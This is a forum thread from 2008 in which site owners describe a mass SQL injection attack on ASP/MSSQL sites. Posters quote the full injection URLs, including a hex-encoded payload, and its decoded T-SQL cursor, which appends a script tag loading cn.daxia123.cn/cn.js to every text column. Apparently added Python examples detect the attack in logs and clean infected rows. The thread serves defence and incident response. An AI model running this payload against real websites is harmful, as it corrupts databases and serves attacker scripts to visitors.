Rising KaKa Security Forum > Technical Exchange > Intrusion Prevention (HIPS)


Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Still keeping an eye on this; a website really can't be left unattended.

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Some websites in Taiwan were hit as well.

My observation is that it isn't a virus; it simply uses a URL plus parameters to update the data in the database.


First attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

Second attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

Third attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(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 aS VaRcHaR(4000));eXeC(@s);--

Fourth attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(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 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

Fifth attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx';dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(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 aS VaRcHaR(4000));eXeC(@s);--

The hex-encoded binary decodes to:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

The damage this method does is extremely serious!!!

Without anti-injection measures, one of the attempts will eventually succeed.
After I restored my database, I foolishly tried it once myself... and had to restore all over again.
Besides preventing injection, is there a better approach?
Last edited by yuchou7 on 2008-12-27 10:36:38

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Final report: after applying injection hardening, my site is running normally again. Looking at the logs of the attacks against the customer registration page, there is a large volume of injection code. Heh, injection attacks are simple and cross-platform, so hackers probably like this kind of attack.
I suggest everyone put the anti-injection code in the page that opens the database, such as conn.asp, so that the data is validated every time the database is opened!

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Reposted:
My observation is that it isn't a virus; it simply uses a URL plus parameters to update the data in the database.


First attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

Second attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

Third attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

Fourth attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(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 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

Fifth attempt:
http://xxx.xxx.xxx/xxx.asp?xxx=xxx';dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

The hex-encoded binary decodes to:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

The damage this method does is extremely serious!!!

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

I was hit by this daxia123 trojan too. I used a temporary workaround: I restricted the length of the varchar and nvarchar columns. Find the longest value currently stored in each column, N, then set that column's maximum length to N. It seems to work reasonably well; at least there has been no injection for 2 days now. For the other columns, such as ntext or text, I added a trigger restriction that does not allow script to be inserted.

If it is binary injection, as post #13 says, I think checking the length of the POST value could serve as a temporary fix; after all, a value that long would never be submitted under normal circumstances.

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

My site got the same thing, exactly like the OP's.

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Reading the logs, I found the following. What do these statements do? And what does that long string mean?
'and (select char(94)+cast(count(1) as varchar(100))+char(94) from [master]..[sysdatabases])>0 and ''='

declare @S varchar(4000)
set @s=cast(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 as varchar(4000));
exec(@s);
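The two stages quoted in the post above (a probe against [master]..[sysdatabases], then a hex literal run through cast(...) and exec(@s)) leave a distinctive trace in the web-server log, and the length check suggested a few posts earlier is only one weak signal next to them. The script below is an added example, not code from this thread or from any of its posters: it scans constructed IIS-style log lines (the sample lines, client addresses and the hex literal are all made up, and the literal decodes to a harmless placeholder string rather than the cursor payload), URL-decodes and lower-cases the query string so that the mixed-case spelling (sElEcT, cAsT) buys the attacker nothing, flags each stage, and decodes any long 0x literal so an analyst can read what was smuggled past a keyword filter. The same indicator check can be run against each incoming request from the page that opens the database, as suggested earlier in the thread.

```python
import re
from urllib.parse import unquote_plus

# Hex body used in the constructed sample log below. It decodes to a harmless
# placeholder string, NOT to the cursor payload quoted in the thread.
PLACEHOLDER_HEX = "SELECT 1 -- constructed placeholder".encode("ascii").hex().upper()

# Constructed IIS (W3C) log lines, fields: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status. Line 2 mirrors the probe stage seen in the thread,
# line 3 the hex-encoded stage; lines 1 and 4 are ordinary traffic.
SAMPLE_LOG = (
    "2008-12-20 03:14:07 10.0.0.5 GET /news.asp id=12 200\n"
    "2008-12-20 03:14:09 10.0.0.5 GET /news.asp "
    "id=12'+AnD+(sElEcT+ChAr(94)%2BcAsT(CoUnT(1)+aS+VaRcHaR(100))%2BChAr(94)"
    "+fRoM+[mAsTeR]..[sYsDaTaBaSeS])>0+AnD+''=' 500\n"
    "2008-12-20 03:14:11 10.0.0.5 GET /news.asp "
    f"id=12;dEcLaRe+@S+VaRcHaR(4000)+SeT+@s=cAsT(0x{PLACEHOLDER_HEX}"
    "+aS+VaRcHaR(4000));eXeC(@s);-- 200\n"
    "2008-12-20 03:15:00 10.0.0.9 GET /search.asp q=0x1F+laptop 200\n"
)

# Strong indicators: any one of these is enough to flag the request.
STRONG = {
    "hex literal cast to a string": re.compile(
        r"cast\s*\(\s*0x[0-9a-f]{8,}\s+as\s+(?:n?varchar|n?char)", re.I),
    "dynamic SQL via EXEC(@var)": re.compile(r"\bexec\s*\(\s*@\w+\s*\)", re.I),
    "DECLARE of a variable": re.compile(r"\bdeclare\s+@\w+", re.I),
    "system-catalog probe": re.compile(
        r"\b(?:sysdatabases|sysobjects|syscolumns)\b", re.I),
}
# Weak indicator: reported for context, never flags a request on its own.
WEAK = {"trailing comment terminator": re.compile(r"--\s*$")}

HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})", re.I)


def decode_hex_literals(text):
    """Decode every long 0x... literal in text so an analyst can read what a
    keyword filter never saw. Odd-length literals are not valid byte strings
    and are skipped; short ones (fewer than 8 digits) are ordinary values."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:
            continue
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded


def scan_log(log_text):
    """Return one finding per flagged log line. The query string is URL-decoded
    and lower-cased first, so the attacker's mixed-case keywords match as
    written in the indicator table."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 7:          # not a request line (header, blank, ...)
            continue
        client, stem, query = fields[2], fields[4], fields[5]
        decoded = unquote_plus(query).lower()
        hits = [name for name, rx in STRONG.items() if rx.search(decoded)]
        if not hits:
            continue
        hits += [name for name, rx in WEAK.items() if rx.search(decoded)]
        payloads = decode_hex_literals(decoded)
        if any("<script" in p.lower() for p in payloads):
            hits.append("decoded hex literal contains a <script> tag")
        findings.append({
            "line": lineno,
            "client": client,
            "uri": stem,
            "indicators": hits,
            "query_length": len(decoded),   # the length heuristic, for comparison
            "decoded_hex": payloads,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['client']} {f['uri']} len={f['query_length']}")
        for name in f["indicators"]:
            print("   -", name)
        for p in f["decoded_hex"]:
            print("   decoded:", p)
```

Run stand-alone it prints the two flagged lines with their indicators and the decoded literal; the short 0x1F on the last line is not flagged, which is the case a bare "contains 0x" rule gets wrong. The query length is reported alongside the indicators rather than used as a trigger: the probe stage is not especially long, so a length threshold alone would miss the reconnaissance that precedes the payload.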

Reply to huangguaxuan's post (#27)

That hex-encoded binary decodes to:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

It UPDATEs every column in your database that meets the condition, appending the string <script src=http://cn.daxia123.cn/cn.js></script>.

Reference:
http://blog.yam.com/yuchou/article/18968167
Last edited by yuchou7 on 2008-12-27 18:03:44
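Because the cursor only ever appends one fixed literal to the text-typed columns it enumerates (syscolumns.xtype 99, 35, 231 and 167), the clean-up is the reverse of the UPDATE explained above. The following is an added example, not the thread's own code: it models that clean-up offline in Python over a constructed dump of rows (the table names, keys and values are made up; the cn.daxia123.cn src is the one from the thread), removes every copy of the tag, including the doubled copies left on a site that was hit twice, reports which columns were affected, and re-checks a row set so a backup can be verified before it is restored. In production the same REPLACE would be issued in T-SQL against the same column list.

```python
import re

# The src the payload in the thread injects; everything else in this example
# (table names, rows, keys) is constructed.
INJECTED_SRC = "http://cn.daxia123.cn/cn.js"
INJECTED_TAG = f"<script src={INJECTED_SRC}></script>"

# Column types the cursor in the decoded payload enumerates, keyed by
# syscolumns.xtype: only these can have received the tag.
TARGET_XTYPES = {99: "ntext", 35: "text", 231: "nvarchar", 167: "varchar"}

# Constructed dump rows: one entry per (table, column, primary key). Row 2 was
# hit twice, row 3 is an int column (xtype 56) the payload cannot touch,
# row 5 is a NULL ntext value.
SAMPLE_ROWS = [
    {"table": "News", "column": "Title", "xtype": 231, "pk": 1,
     "value": "Welcome" + INJECTED_TAG},
    {"table": "News", "column": "Body", "xtype": 35, "pk": 1,
     "value": "Hello world" + INJECTED_TAG + INJECTED_TAG},
    {"table": "News", "column": "Hits", "xtype": 56, "pk": 1, "value": "42"},
    {"table": "Users", "column": "Email", "xtype": 167, "pk": 7,
     "value": "a@example.com"},
    {"table": "Users", "column": "Bio", "xtype": 99, "pk": 7, "value": None},
]


def injected_tag_pattern(src=INJECTED_SRC):
    """Match the injected tag case-insensitively, with or without quotes
    around the src, so a quoted variant of the same tag is caught too."""
    return re.compile(
        r"<script\s+src=[\"']?" + re.escape(src) + r"[\"']?\s*>\s*</script>",
        re.I)


def strip_injected_tag(value, src=INJECTED_SRC):
    """Return (cleaned_value, copies_removed). NULL stays NULL. The payload
    RTRIMs the original before appending, so trailing whitespace that existed
    before the attack is gone for good and is not reintroduced here."""
    if value is None:
        return None, 0
    return injected_tag_pattern(src).subn("", value)


def clean_rows(rows, src=INJECTED_SRC):
    """Clean every targetable row and report, per (table, column), how many
    rows carried the tag and how many copies were removed in total."""
    cleaned, report = [], {}
    for row in rows:
        row = dict(row)
        if row["xtype"] in TARGET_XTYPES:
            row["value"], n = strip_injected_tag(row["value"], src)
            if n:
                key = (row["table"], row["column"])
                rows_hit, copies = report.get(key, (0, 0))
                report[key] = (rows_hit + 1, copies + n)
        cleaned.append(row)
    return cleaned, report


def remaining_hits(rows, src=INJECTED_SRC):
    """Keys of rows that still carry the tag. Run this against a backup before
    restoring it: a backup taken after the attack already contains the tag,
    and restoring it puts the script straight back on every page."""
    pattern = injected_tag_pattern(src)
    return [(r["table"], r["column"], r["pk"])
            for r in rows if r["value"] and pattern.search(r["value"])]


if __name__ == "__main__":
    cleaned, report = clean_rows(SAMPLE_ROWS)
    for (table, column), (rows_hit, copies) in report.items():
        print(f"{table}.{column}: {rows_hit} row(s), {copies} tag copies removed")
    print("remaining after clean-up:", remaining_hits(cleaned))
```

The report separates rows hit from copies removed because a column that was overwritten in two separate waves shows twice as many copies as rows, which tells you how many times the site was compromised before the clean-up. Only columns of the four targeted types are examined, which keeps the pass cheap on large tables and matches what the payload could actually have touched.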

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Our site had the same thing, starting in early December, also with cn.daxia123.cn/cn.js.
But it doesn't look like direct injection into the database; instead the site's files are modified directly. No matter how I set the NTFS permissions, they can still modify them, and sometimes they even create system accounts. I have no idea where they are getting in.

Reply: Help! Hit by http://cn.daxia123.cn/cn.js, an intrusion or a virus/attack

Completely uninstall the database on the server, reinstall it, restore the data,
and add anti-injection code; that should do it.
My site was hammered by daxia123 for 2 days and 2 nights. I've just restored it and it's fine now.
Powered by Discuz!NT